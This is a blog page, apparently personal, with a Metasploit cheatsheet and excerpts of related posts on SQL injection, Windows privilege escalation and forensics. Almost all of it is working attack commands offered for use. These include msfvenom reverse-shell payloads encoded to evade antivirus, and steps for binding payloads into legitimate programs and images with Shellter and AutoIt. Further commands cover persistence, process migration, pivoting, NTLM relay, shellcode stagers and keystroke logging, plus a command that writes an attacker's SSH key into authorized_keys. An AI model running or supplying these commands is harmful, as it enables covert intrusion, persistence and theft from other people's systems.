Skip to main content

Metasploit Commands Cheatsheet


Basic Metasploit Commands 

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=attacker_Ip -f exe -e x86/shikata_ga_nai -i 3 -b '\x00\xff' > /root/Desktop/encoded.exe

shellter --> shellter is a dynamic shellcode injection tool, it can be used in order to inject shellcode into
native windows applications

downlaod any program to bind our payload 
download and open shellter in windows
Select "A"
select "N"
drag the program to which our payload is to be binded

select "stealth mode" y
L
1
set attacker_ip
set port 8080
--------------------------------

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set lport 8080
MAINTAINING PERSISTANT CONNECTION

#get into a meterpreter connection first

background
use exploit/windows/local/persistence
show options
set EXE_NAME service1
set DELAY 10
sessions -i           /show sessions
set session 3
show advanced
set EXE::CUSTOM /root/Desktop/malw.exe
show options 
run // payload successfully injected into target machine

sessions 3

meterpreter>
Process Migration 

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
set LPORT

run

meterpreter> ps               /lists all running processes
meterpreter > migrate ANY_PID
              migrate 255
Binding a Payload to a Legitimate Executablel to Meterperter

msfvenom -p windows/shell_reverse_tcp LHOST=KALI_IP LPORT=443 -f exe -e -e x86/shikata_ga_nai -i 9 -x plink.exe -o payload_plink.exe

# Meterpreter list active port forwards
portfwd list 

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd add –l 3389 –p 3389 –r target-host 
portfwd add -l 88 -p 88 -r 127.0.0.1
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd delete –l 3389 –p 3389 –r target-host 
# Meterpreter delete all port forwards
portfwd flush 

or

# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
run autoroute -s 192.168.15.0/24 
use auxiliary/server/socks4a

# Meterpreter list all active routes
run autoroute -p 

route #Meterpreter view available networks the compromised host can access
# Meterpreter add route for 192.168.14.0/24 via Session number.
route add 192.168.14.0 255.255.255.0 3 
# Meterpreter delete route for 192.168.14.0/24 via Session number.
route delete 192.168.14.0 255.255.255.0 3 
# Meterpreter delete all routes
route flush 
Normal Shel
#list the sessions
sessions -i
use post/multi/manage/shell_to_meterpreter
set sessions 1 
run 

or 

sessions -i
#migrate from normal shell to meterpereter
sessions -u 1
#login in as meterpterter 2=the session number
sessions 2
Metasploit One Liner

msfconsole -x "use exploit/unix/smtp/qmail_bash_env_exec;set payload cmd/unix/reverse;set LPORT 8080;set RPORT 25;set RHOST 10.10.10.10;set mailto 'admin@testqmail2.test';run;"
Pivoting

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 10.14.14.6
run
background
sessions -i
use post/multi/manage/autoroute
set SUBNET 192.168.125.0
set SESSION 1
run
use auxiliary/server/socks_proxy
set SRVPORT 1060
run






use auxiliary/server/socks5 
set SRVPORT 1090

#on Attacker Machine
sudo nano /etc/proxychains.conf
socks5 127.0.0.1 1090
Pivoting - Autoroute method

meterpreter> background

# Add Route
run autoroute -s 192.168.125.0/24

#View Route
run autoroute -p

background

use /auxilary/scanner/portscan/tcp
set RHOSTS 192.168.125.88
set THREADS 5
run

use /auxiliary/server/socks4
info
jobs -l

Setting up proxy on meterpreter

use post/windows/manage/portproxy
set CONNECT_ADDRESS 10.10.10.12
set CONNECT_PORT 80
set LOCAL_ADDRESS 10.10.10.11
set LOCAL_PORT 80
set session 1
run
Setting up Relay Server 

use auxiliary/server/http_ntlmrelay
set RHOST 10.10.10.11
set RURIPATH /admin/admin.php
set URIPATH /
set SRVHOST 10.10.10.12
set SRVPORT 80
run 
Passing session to Metasploit

msf5 exploit(multi/handler) > use exploit/multi/handler
msf5 exploit(multi/handler) > setg payload windows/x64/meterpreter/reverse_https
msf5 exploit(multi/handler) > setg lhost 10.10.10.12
msf5 exploit(multi/handler) > setg lport 8001
msf5 exploit(multi/handler) > setg exitfunc thread
msf5 exploit(multi/handler) > setg exitonsession false
msf5 exploit(multi/handler) > run -j


#generating a Stager
use payload/windows/x64/meterpreter/reverse_http
generate -f raw -u /tmp/shellcode.bin
xxd -ps /tmp/shellcode.bin | tr -d "\n"

#copy the shellcode and it can be run on the target machine, which returns a reverse shell to metasploit. this can be easily done via Covenant
#Go to your Grunt --> Task --> ShellCode --> paste the Hex data and execut the task. you should see a reverses shell on metasploit  
BINDING A PAYLOAD TO A IMAGE

#downlaod and open autoit
#open the script that you have, replace the url with the acutal image url
#browser the script into the autoit
#set it to exe
tick --> x64
select a icon, download it and browse it -->
use this to convert a image to icon -->  https://image.online-convert.com/convert-to-ico

now bind it with a payload using shellter
create a payload

msfconsole
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp

--> run the exploit on the target machine ..

 

=======================================  

Meterpreter Commands
======================================

#list the process
Meterpreter> ps

#Migrate the process to explorer for better connection
migrate PID

#start capturing keystrokes
keyscan_start

#dump keystrokes

keyscan_dump

#Send a keystroke
meterpreter > keyboard_send "cd /root/.ssh"

#Send "Enter" key
meterpreter > keyevent 13 press

#Send a keystroke
meterpreter > keyboard_send "echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDde44691/2bS5G+W9uUQ9tgJw0BJHkwUxLr5woKeh5JbYBOcrygf1rZbFBxsRcEExK0x2kSOU4DRmpcctQ+qq5ZqeYXboAGLrZBQl9hmnovbbC/5grj+Vj+OnMHaREpBTL7VXODN80KQ1/eKvqPpzx7dQt38xXKg9T8E4+X3BYEf6samL/R97do//yLAXwoDz8jRzeip23qUJrS1eBH7Bb/l+qsLBtnCv09eUDGB7JTm+m5DlnCrZRfzXmAUimH2TFgTARHOJxlrD97+uywfax6LTjCMT7p5PI7sX6F9r4gzFBHzojmuJmUXe22LcVkZvUKMdhDSYssh7XRfLrESXWsSGbgwXql+jgOcxbpc8qwakLY8x1ZkyswJOn4hFyYGojNR0fA/gY6093IDUJ3xwBQCn3Eb3jEosR54YRMeq8IJzAChy28RyV7GiqceK408Qihk3/ECHrmWI8mZ1BxJJuaq6xfP9diiARjplX6bYMZN7C2zGRAHWe7NvgONve+Ts= Bhanu@HackingDream > authorized_keys"
[*] Done

#Send "Enter" key
meterpreter > keyevent 13 press

#Take Screenshot

meterpreter > screenshot
Screenshot saved to: /home/Bhanu//FabUVLRz.jpeg







Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensically, free online photo forensics tools - 29a.ch 2)  StegSolve to decryt data in